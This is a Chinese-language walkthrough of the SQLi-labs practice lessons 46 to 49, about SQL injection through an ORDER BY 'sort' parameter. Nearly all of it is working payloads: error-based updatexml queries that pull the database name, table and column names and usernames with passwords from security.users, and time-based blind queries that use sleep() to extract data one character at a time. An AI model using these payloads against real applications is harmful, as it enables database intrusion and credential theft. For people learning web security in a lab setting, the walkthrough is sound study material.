lesson46_49

补充知识

在sql语句中，asc是指定按升序排列的，desc是按降序来排列的

select * from users order by 1 desc;

select * from users order by 1 asc;

lines terminated by XXX 每一行以XXX为结尾

lesson46

提示输入sort

?sort=1

?sort=2

发现sort 后面因该跟的是列数，1列就按1到14排序，2列就是a到z排序

效果跟 order by 一样

首先是用联合查询尝试，不行

然后我们尝试报错注入

?sort=3 and updatexml(1,concat(0x7e,(database())),1)–+

?sort=3 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),1)–+

?sort=3 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=0x7573657273)),1)–+

?sort=3 and updatexml(1,concat(0x7e,(select group_concat(concat(0x7e,username,password))from security.users)),1)–+

方法二用时间（延迟）注入

?sort=1 and if(left(database(),1)=’s’,sleep(3),1)–+

lesson47

lesson47与46做法一样

就是数据包裹不同，lesson47是用单引号进行包裹的

?sort=3 and updatexml(1,concat(0x7e,(database())),1)–+

?sort=3 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),1)–+

?sort=3 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=0x7573657273)),1)–+

?sort=3 and updatexml(1,concat(0x7e,(select group_concat(concat(0x7e,username,password))from security.users)),1)–+

lesson48

没有报错的回显所以不能用报错注入

只能用时间(延迟)注入

?sort=1 and if(left(database(),8)=’security’,sleep(2),1)–+

lesson49

也没有报错回显，用时间注入

?sort=1 and if(left(database(),8)=’security’,sleep(2),1)–+

?sort=1 and if(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1)=’e’,1,sleep(2))–+

?sort=1 and if(substr((select column_name from information_schema.columns where table_name=’users’ limit 0,1),1,1)=’e’,1,sleep(2))–+

?sort=1 and if(substr((select username from security.users limit 0,1),1,1)=’e’,1,sleep(2))–+

?sort=1 and if(substr((select password from security.users limit 0,1),1,1)=’e’,1,sleep(2))–+